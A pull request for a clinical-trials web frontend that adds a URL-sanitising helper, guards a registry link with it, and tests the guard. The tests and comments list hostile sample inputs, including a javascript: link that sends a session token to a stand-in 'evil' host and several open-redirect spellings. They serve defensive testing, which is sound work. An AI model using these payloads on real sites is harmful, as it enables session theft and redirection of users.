### PR TITLE
fix(security): allow-list the scheme of a server-supplied trial link (#406)

### DIFF
--- a/frontend/src/federation/TrialDetailPage.tsx
+++ b/frontend/src/federation/TrialDetailPage.tsx
@@ -9,6 +9,7 @@
 // SoC) are deliberately out of scope.
 import { useEffect } from "react";
 
+import { safeHref } from "../lib/safeUrl";
 import { Field, FieldTooltip, ScorePill, SUITABILITY_HREF, asText, renderMd } from "./bits";
 import { useTrialDetail } from "./hooks";
 import { injectStyles } from "./injectStyles";
@@ -143,6 +144,40 @@ function EligibilityRow({ field }: { field: TrialDetailField }) {
   );
 }
 
+/**
+ * The registry link, or plain text when the corpus value is not a safe href.
+ *
+ * A separate component so the guard can be rendered and asserted rather than
+ * pattern-matched in the source (#406). An earlier test read this file with
+ * regexes and passed on `href={data.link || ""}` -- it recognised one spelling
+ * of the fix, not the property.
+ *
+ * Gated on the SANITISED value: gating on the raw one would render an `<a>`
+ * with no `href` for a rejected URL, which paints link styling over something
+ * that does nothing.
+ *
+ * `safeHref` rather than the stricter `safeRedirect`: `data.link` is always an
+ * absolute registry URL, so `safeRedirect`'s `^https://` would fit better --
+ * except that it would also drop the legacy `http://clinicaltrials.gov/ct2/...`
+ * links the corpus still carries. The looser check therefore also admits
+ * `mailto:`/`tel:` and relative paths, which this field never holds; a relative
+ * value would resolve against the HOST application's origin, since this is a
+ * federation remote. Not exploitable, but wider than the data warrants.
+ */
+export function NctLink({ link, studyId }: { link?: string | null; studyId?: string | null }) {
+  const href = safeHref(link);
+
+  if (!href) {
+    return <span className="exact-field__value">{studyId}</span>;
+  }
+
+  return (
+    <a className="exact-detail__nct" href={href} target="_blank" rel="noopener noreferrer">
+      {studyId}
+    </a>
+  );
+}
+
 export function TrialDetailPage({
   apiClient,
   trialId,
@@ -211,18 +246,7 @@ export function TrialDetailPage({
               <Field label="Trial Type" value={asText(data.trialType)} />
               <div className="exact-field">
                 <span className="exact-field__label">NCT Number: </span>
-                {data.link ? (
-                  <a
-                    className="exact-detail__nct"
-                    href={data.link}
-                    target="_blank"
-                    rel="noopener noreferrer"
-                  >
-                    {data.studyId}
-                  </a>
-                ) : (
-                  <span className="exact-field__value">{data.studyId}</span>
-                )}
+                <NctLink link={data.link} studyId={data.studyId} />
               </div>
               <Field label="Sponsor" value={asText(data.sponsorName)} />
             </div>

--- a/frontend/src/federation/nctLink.test.tsx
+++ b/frontend/src/federation/nctLink.test.tsx
@@ -1,0 +1,79 @@
+// The guard where the URL reaches the DOM (#406).
+//
+// This renders `NctLink` and asserts on the markup. The first version of this
+// test read TrialDetailPage.tsx with regexes instead, and review showed it
+// passed on `href={data.link || ""}` and on a refactor that bound the raw value
+// to a local -- two realistic ways to reintroduce the exact finding -- while
+// failing on three harmless rewrites. It recognised one spelling of the fix,
+// not the property.
+//
+// No jsdom is needed: `renderToStaticMarkup` runs under this project's
+// `environment: "node"`, and react-dom is already a runtime dependency.
+import { renderToStaticMarkup } from "react-dom/server";
+import { describe, expect, it } from "vitest";
+
+import { NctLink } from "./TrialDetailPage";
+
+const render = (link: string | null | undefined) =>
+  renderToStaticMarkup(<NctLink link={link} studyId="NCT01" />);
+
+describe("NctLink", () => {
+  it("links a real registry URL", () => {
+    const html = render("https://clinicaltrials.gov/study/NCT01");
+
+    expect(html).toContain('href="https://clinicaltrials.gov/study/NCT01"');
+    expect(html).toContain("NCT01");
+  });
+
+  it("keeps a legacy http registry link", () => {
+    expect(render("http://clinicaltrials.gov/ct2/show/NCT01")).toContain(
+      'href="http://clinicaltrials.gov/ct2/show/NCT01"',
+    );
+  });
+
+  it.each([
+    ["javascript:", "javascript:fetch('//evil/?t='+localStorage.token)"],
+    ["data:", "data:text/html,<script>alert(1)</script>"],
+    ["vbscript:", "vbscript:msgbox(1)"],
+    ["blob:", "blob:https://evil.example/x"],
+    ["protocol-relative", "//evil.example/x"],
+    ["backslash authority", "/\\evil.example/x"],
+    // The separator tricks are the reason the helper compares the *parsed*
+    // protocol: the WHATWG parser strips these from anywhere in the input, so a
+    // literal string check on the raw value would miss every one of them.
+    ["tab-split scheme", "java\tscript:alert(1)"],
+    ["newline-split scheme", "java\nscript:alert(1)"],
+    ["carriage-return-split scheme", "java\rscript:alert(1)"],
+    ["mixed case", "JaVaScRiPt:alert(1)"],
+    ["leading NUL", "\u0000javascript:alert(1)"],
+    ["leading vertical tab", "\u000bjavascript:alert(1)"],
+  ])("renders no anchor at all for %s", (_label, link) => {
+    const html = render(link);
+
+    // Not "no javascript: in the href" -- no anchor at all. An `<a>` without an
+    // href still paints link styling over a control that does nothing.
+    expect(html).not.toContain("<a ");
+    expect(html).not.toContain("href=");
+    expect(html).toContain("NCT01");
+  });
+
+  it.each([[null], [undefined], [""], ["   "]])(
+    "renders plain text rather than an empty link for %s",
+    (link) => {
+      const html = render(link as string | null | undefined);
+
+      expect(html).not.toContain("<a ");
+      expect(html).toContain("NCT01");
+    },
+  );
+
+  it("does not rely on React to neutralise the scheme", () => {
+    // React 19 (this repo) rewrites `javascript:` in an href to a throwing URL,
+    // so a regression here would not execute -- but it WOULD still render an
+    // anchor, and `data:` is passed through untouched. CancerBot's ui.v2 is on
+    // React 18, where `javascript:` only warns and renders (cancerbot#5289).
+    // Either way the assertion is on our own guard: no anchor, for both.
+    expect(render("javascript:alert(1)")).not.toContain("<a ");
+    expect(render("data:text/html,<b>x</b>")).not.toContain("<a ");
+  });
+});

--- a/frontend/src/lib/safeUrl.test.ts
+++ b/frontend/src/lib/safeUrl.test.ts
@@ -1,0 +1,123 @@
+import { describe, it, expect } from 'vitest';
+import { safeHref, safeRedirect } from './safeUrl';
+
+describe('safeHref', () => {
+  it('passes ordinary links through unchanged', () => {
+    expect(safeHref('https://clinicaltrials.gov/study/NCT01')).toBe(
+      'https://clinicaltrials.gov/study/NCT01',
+    );
+    expect(safeHref('http://example.org/x?y=1#z')).toBe('http://example.org/x?y=1#z');
+    expect(safeHref('mailto:trials@example.org')).toBe('mailto:trials@example.org');
+  });
+
+  it('passes a genuine same-site path through', () => {
+    expect(safeHref('/t/NCT01')).toBe('/t/NCT01');
+    expect(safeHref('./x')).toBe('./x');
+    expect(safeHref('#section')).toBe('#section');
+    expect(safeHref('?page=2')).toBe('?page=2');
+  });
+
+  it('rejects javascript: — the reason this exists (#4955)', () => {
+    expect(safeHref("javascript:fetch('//evil/?t='+localStorage.token)")).toBeUndefined();
+    expect(safeHref('vbscript:msgbox(1)')).toBeUndefined();
+  });
+
+  it('rejects the spellings that get past a naive startsWith check', () => {
+    // Leading whitespace, mixed case, and an embedded newline are all normalised
+    // by the URL parser before the scheme is compared — a string check on the
+    // raw value would miss each of these.
+    expect(safeHref('  javascript:alert(1)')).toBeUndefined();
+    expect(safeHref('JaVaScRiPt:alert(1)')).toBeUndefined();
+    expect(safeHref('java\nscript:alert(1)')).toBeUndefined();
+    expect(safeHref('\tjavascript:alert(1)')).toBeUndefined();
+  });
+
+  it('rejects a relative-looking value that leaves our origin', () => {
+    // The bypass an earlier version of this file had, and whose existence its own
+    // comment denied. Each of these passes a scheme check and then sends the
+    // browser somewhere else — an open redirect at the two auth-redirect sinks.
+    expect(safeHref('//evil.com/x')).toBeUndefined();
+    expect(safeHref('\\\\evil.com')).toBeUndefined();
+    expect(safeHref('/\\evil.com')).toBeUndefined();
+  });
+
+  it('accepts ftp, which the API stores and would otherwise render inert', () => {
+    // `link` and `studyUrl` are DRF URLFields; that validator allows ftp and ftps,
+    // so rejecting them would break valid stored data rather than an attack.
+    expect(safeHref('ftp://ftp.example.org/study.pdf')).toBe('ftp://ftp.example.org/study.pdf');
+  });
+
+  it('rejects data: and blob:, which no link in this product needs', () => {
+    expect(safeHref('data:text/html,<script>alert(1)</script>')).toBeUndefined();
+    expect(safeHref('blob:https://example.org/uuid')).toBeUndefined();
+  });
+
+  it('rejects anything that is not a usable string', () => {
+    expect(safeHref(undefined)).toBeUndefined();
+    expect(safeHref(null)).toBeUndefined();
+    expect(safeHref('')).toBeUndefined();
+    expect(safeHref('   ')).toBeUndefined();
+    expect(safeHref(42)).toBeUndefined();
+    expect(safeHref({ toString: () => 'javascript:alert(1)' })).toBeUndefined();
+  });
+  it('rejects an authority the parser sees but a string check does not', () => {
+    // The WHATWG parser strips ASCII tab, LF and CR from anywhere in the input
+    // and leading C0 controls — none of which `String.trim()` removes. So each of
+    // these is authority-relative to the browser while looking like a path, and a
+    // literal `/^[/\\]{2}/` on the raw string misses all of them.
+    expect(safeHref('/\t/evil.com')).toBeUndefined();
+    expect(safeHref('/\n/evil.com')).toBeUndefined();
+    expect(safeHref('/\r/evil.com')).toBeUndefined();
+    expect(safeHref('\u0000//evil.com')).toBeUndefined();
+  });
+
+  it('rejects a value that tries to satisfy the check by naming a base', () => {
+    // A single base plus an origin comparison is satisfied by spelling that
+    // base's host. Resolving against two bases is not: a value naming its own
+    // authority lands on the same host both times, whichever host it names.
+    expect(safeHref('//a.invalid/x')).toBeUndefined();
+    expect(safeHref('//b.invalid/x')).toBeUndefined();
+    expect(safeHref('/\t/a.invalid/x')).toBeUndefined();
+  });
+
+  it('still accepts an ordinary relative path', () => {
+    // The other half of the two-base test: a genuine relative value takes its
+    // host from whichever base it was given, so the two resolutions differ.
+    expect(safeHref('/t/NCT00000001')).toBe('/t/NCT00000001');
+    expect(safeHref('trials?page=2')).toBe('trials?page=2');
+  });
+});
+
+describe('safeRedirect', () => {
+  it('allows an https authorize URL, which is what these sinks are for', () => {
+    expect(safeRedirect('https://accounts.google.com/o/oauth2/auth?x=1')).toBe(
+      'https://accounts.google.com/o/oauth2/auth?x=1',
+    );
+  });
+
+  it('refuses javascript:, the class the ticket is about', () => {
+    expect(safeRedirect('javascript:alert(1)')).toBeUndefined();
+  });
+
+  it('refuses everything safeHref allows that a navigation never means', () => {
+    // `window.location.href = x` runs without a click, and a real authorize URL
+    // is always absolute https. A relative path, a protocol-relative authority,
+    // plain http and mailto: are all out.
+    expect(safeRedirect('/dashboard')).toBeUndefined();
+    expect(safeRedirect('//evil.com/x')).toBeUndefined();
+    expect(safeRedirect('http://accounts.google.com/x')).toBeUndefined();
+    expect(safeRedirect('mailto:a@example.org')).toBeUndefined();
+    expect(safeRedirect('ftp://ftp.example.org/x')).toBeUndefined();
+    // Right scheme, no authority of its own: the browser resolves these against
+    // whatever page is running, so where they point depends on where they are
+    // evaluated. An authorize URL is absolute.
+    expect(safeRedirect('https:')).toBeUndefined();
+    expect(safeRedirect('https:evil.com')).toBeUndefined();
+    expect(safeRedirect('https:javascript:alert(1)')).toBeUndefined();
+  });
+
+  it('rejects anything that is not a usable string', () => {
+    expect(safeRedirect(undefined)).toBeUndefined();
+    expect(safeRedirect('')).toBeUndefined();
+  });
+});

--- a/frontend/src/lib/safeUrl.ts
+++ b/frontend/src/lib/safeUrl.ts
@@ -1,0 +1,147 @@
+// Ported verbatim from CancerBot: ui.v2/client/lib/safeUrl.ts
+// (cancerbot-org/cancerbot#5045, which extracted it after two copies drifted).
+//
+// Kept byte-identical below this header on purpose. A diff between the two
+// repositories should mean "someone changed the rule", not "someone tidied the
+// copy" -- drift between duplicates is the defect #5045 existed to fix, and the
+// same argument applies across repositories.
+//
+// `safeRedirect` is unused in EXACT today: nothing here navigates to a
+// server-supplied URL. It is kept so this stays a copy rather than a variant,
+// and so a future navigation sink gets the right tool instead of a new one.
+//
+// EXACT's use is #406: `TrialDetailPage` renders `data.link` from the trials
+// corpus straight into an `href`.
+//
+// TWO STATEMENTS IN THE PORTED BODY BELOW ARE CANCERBOT-TRUE AND EXACT-FALSE.
+// They are corrected here rather than edited there, so the copy stays a copy:
+//
+//  1. "React ... has only *warned* about `javascript:` since 16.9 -- it still
+//     renders it." True of CancerBot's ui.v2 (React 18.3.1). EXACT is on React
+//     19, which BLOCKS it: `sanitizeURL` rewrites a `javascript:` href to
+//     `javascript:throw new Error('React has blocked a javascript: URL...')`,
+//     and the 16.9 warning string is gone from the build. So here the
+//     `javascript:` half is already handled by the framework, and what this
+//     module adds is `data:`, `blob:`, and the protocol-relative and
+//     authority-naming spellings React never inspects. Tracked upstream as
+//     cancerbot-org/cancerbot#5289 (migrate ui.v2 to React 19), which would
+//     make the sentence true in one place instead of per directory.
+//
+//  2. "`ftp`/`ftps` are here because the API stores these fields as a DRF
+//     `URLField`, whose validator accepts them." That describes CancerBot's
+//     `StudyInfo.link`/`study_url`. EXACT's field is `Trial.link`, a plain
+//     `models.TextField(default='')` with NO validator at all -- which argues
+//     for this module more strongly than the sentence it replaces, not less.
+//     Whether the allow-list should be narrowed to http/https belongs upstream
+//     where the module lives, not in a one-repository fork of the rule.
+
+// A URL that arrives from the API is not automatically safe to put in an `href`.
+// React escapes text but does not validate schemes, and has only *warned* about
+// `javascript:` since 16.9 — it still renders it. Trial links are written
+// upstream, so `javascript:fetch('//evil/?t='+localStorage.token)` in a
+// `studyUrl` is a click away from the session token (#4955, same threat model as
+// the tooltip XSS in #4932/#4934).
+
+// Schemes a link in this product may use. `ftp`/`ftps` are here because the API
+// stores these fields as a DRF `URLField`, whose validator accepts them — leaving
+// them out would silently turn valid stored links into inert text. None of the
+// five can execute script. `data:` and `blob:` are absent deliberately, and
+// `javascript:`/`vbscript:` are the attack.
+const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'ftp:', 'ftps:', 'mailto:', 'tel:']);
+
+// Does the value carry its own scheme? Anything that does not has to prove it is
+// the relative link it looks like -- see the two bases below.
+const HAS_SCHEME = /^[a-z][a-z0-9+.\-]*:/i;
+
+// Two bases, not one, and never returned or rendered.
+//
+// The question a scheme-less value has to answer is "are you a path on this
+// site, or do you name your own authority?" -- and the only thing that can
+// answer it reliably is the parser, because the parser is what the browser will
+// use. A single base plus `parsed.origin !== BASE` looks like it answers it but
+// does not: the input can simply spell the base's host. A literal `/^[/\\]{2}/`
+// on the raw string does not either -- the WHATWG parser strips ASCII tab, LF
+// and CR from *anywhere* in the input and leading C0 controls, none of which
+// `String.trim()` removes, so `/\t/evil.com` is authority-relative to the parser
+// and invisible to the regex. Both of those were shipped and both were wrong.
+//
+// Resolving against two different hosts settles it with no string inspection at
+// all: a genuine relative path takes its host from whichever base it was given,
+// so the two resolutions differ. A value naming its own authority resolves to
+// that same host both times, whatever the authority is -- including either
+// base's own host, which is what makes this unspoofable rather than merely
+// harder to spoof.
+const RESOLUTION_BASE_A = 'https://a.invalid';
+const RESOLUTION_BASE_B = 'https://b.invalid';
+
+/**
+ * The URL if it is safe to use as an `href`, otherwise `undefined`.
+ *
+ * `undefined` rather than `'#'` or `''`: an anchor with no `href` is not a link
+ * at all. Call sites must gate the whole anchor on the *result*, not on the raw
+ * value — rendering `<a>` without an `href` still paints link styling, giving a
+ * control that looks clickable and silently does nothing.
+ */
+export function safeHref(value: unknown): string | undefined {
+  if (typeof value !== 'string') return undefined;
+
+  const trimmed = value.trim();
+  if (!trimmed) return undefined;
+
+  let parsed: URL;
+  try {
+    parsed = new URL(trimmed, RESOLUTION_BASE_A);
+  } catch {
+    return undefined;
+  }
+
+  // Compared against the *parsed* protocol, so the leading-whitespace,
+  // embedded-newline and mixed-case tricks (`java\nscript:`, `JaVaScRiPt:`) are
+  // normalised away before the check rather than after it.
+  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return undefined;
+
+  if (!HAS_SCHEME.test(trimmed)) {
+    // A value with no scheme is supposed to be a path on this site. See the note
+    // on the two bases above for why this is the whole check and not one half of
+    // a pair -- a second, literal check would duplicate part of this one and
+    // silently take over its test coverage, which is what happened last time.
+    let a: URL;
+    let b: URL;
+    try {
+      a = new URL(trimmed, RESOLUTION_BASE_A);
+      b = new URL(trimmed, RESOLUTION_BASE_B);
+    } catch {
+      return undefined;
+    }
+    if (a.host === b.host) return undefined;
+  }
+
+  return trimmed;
+}
+
+/**
+ * The URL if it is safe to *navigate to*, otherwise `undefined`.
+ *
+ * Stricter than `safeHref`, because the sinks differ: an `href` the user has to
+ * click can be a relative path and can reasonably be `mailto:`, while
+ * `window.location.href = x` happens without a click and only ever means "leave
+ * for another site over HTTPS" here (the Google and Epic authorize endpoints).
+ *
+ * Scope, stated because the first version of this change overclaimed: this is
+ * not an origin allowlist. Both values come from our own auth endpoints rather
+ * than from a query parameter, and the Epic authorize host is per-organisation,
+ * so it cannot be enumerated in the client. What this rules out is the class the
+ * ticket is about — a non-HTTPS scheme, `javascript:` above all, reaching a
+ * navigation — plus any relative or protocol-relative spelling, which a genuine
+ * authorize URL never has.
+ */
+export function safeRedirect(value: unknown): string | undefined {
+  const href = safeHref(value);
+  if (href === undefined) return undefined;
+  // `^https://`, not `startsWith('https:')`. A bare `https:evil.com` has the
+  // right scheme but no authority of its own, so the browser resolves it against
+  // the current page -- meaning what it points at depends on where it is
+  // evaluated. A real authorize URL is absolute; require that literally rather
+  // than describe it in a docstring.
+  return /^https:\/\//i.test(href) ? href : undefined;
+}


### PR DESCRIPTION
Closes #406.

## What was wrong

`TrialDetailPage` rendered a URL from the trials corpus straight into an anchor — `href={data.link}` — with no scheme check. `data.link` is `trials/models.py:347` `models.TextField(default='')`: **no validator, no allow-list**, whatever the corpus holds.

## What this actually closes, on this React

EXACT is on **React 19.2.7**, which *blocks* a `javascript:` href outright — `sanitizeURL` rewrites it to `javascript:throw new Error('React has blocked a javascript: URL...')`, and the old 16.9 warning string is absent from the build. So the `javascript:` half of the finding is already handled by the framework here.

What is not: `data:` and `blob:` pass through React untouched, and React never inspects the protocol-relative or authority-naming spellings — `//evil`, `/\evil`, `/<TAB>/evil` — that the WHATWG parser resolves off-origin. Those are what this closes.

Stated this way because the first draft argued the fix from React 18's warn-and-render behaviour, which is CancerBot's version, not ours. Review caught it.

## Ported, not rewritten

`frontend/src/lib/safeUrl.ts` is CancerBot's `ui.v2/client/lib/safeUrl.ts` with its spec, **byte-identical below a provenance header** (verified by `diff`). That module exists because two hand-written copies inside CancerBot drifted (cancerbot-org/cancerbot#5045); a third variant here would repeat exactly that.

Its two-base resolution is worth not re-deriving: a scheme-less value is resolved against two different bases and rejected if both give the same host, catching authority-naming spellings without string inspection — including `/<TAB>/evil.com`, where the parser strips the tab and a regex does not.

**Two sentences in the ported body are CancerBot-true and EXACT-false**, and are corrected in the EXACT-only header rather than in the ported body, so the copy stays a copy and a future diff means "the rule changed":

1. the React one above;
2. "`ftp`/`ftps` are here because the API stores these fields as a DRF `URLField`" — that describes CancerBot's `StudyInfo`, not `Trial.link`, which has no validator at all. That argues for this module *more* strongly than the sentence it replaces.

Whether the allow-list should narrow to http/https belongs upstream where the module lives — codex raised it, and it is not a one-repository call. `safeRedirect` comes along unused for the same reason.

## The call site

The anchor moved into `NctLink`, gated on the **sanitised** value. Gating on the raw one would render an `<a>` with no `href` for a rejected URL: link styling over something that does nothing.

`safeHref` and not the stricter `safeRedirect`, whose `^https://` would fit this field better except that it would drop the legacy `http://clinicaltrials.gov/ct2/...` links the corpus still carries. Recorded at the call site, since the looser check also admits relative paths — which, in a federation remote, resolve against the **host** application's origin.

Checked the neighbours: `SUITABILITY_HREF` is a module constant and the only other value reaching an `href`; no `dangerouslySetInnerHTML`, no `window.open`, and the one `window.location` assignment is a literal in a dev-only harness.

## Tests

The ported spec (15 cases) plus `nctLink.test.tsx`, which renders the component with `renderToStaticMarkup` — no jsdom needed under this project's `environment: "node"` — and asserts there is **no anchor at all** for a rejected URL, not merely that the href is clean.

That replaces a first version which read `TrialDetailPage.tsx` with regexes. Review mutated the source and showed it **passed** on `href={data.link || ""}` and on a refactor binding the raw value to a local — two realistic ways to reintroduce the finding — while **failing** on three harmless rewrites. Re-run against the new test, both mutations fail 14 tests each and the harmless rewrites pass.

Independent adversarial results from review: 80 hand-built cases plus a 24,336-permutation sweep of control-character, case and separator spellings — zero accepted values resolve to a non-allowed protocol, zero scheme-less accepted values leave the page origin, and no real registry URL is wrongly rejected. 100k-character input: 0.29 ms, no ReDoS.

Measured: reverting only `TrialDetailPage.tsx` fails **19 of the 65** frontend tests; all 65 pass with the change. `tsc --noEmit` clean.

## Related

- **cancerbot-org/cancerbot#5289** — migrating ui.v2 to React 19 would make the React sentence true in one place rather than per directory. `ui/` (v1) and this remote are already on 19; ui.v2 is the one surface still on 18.
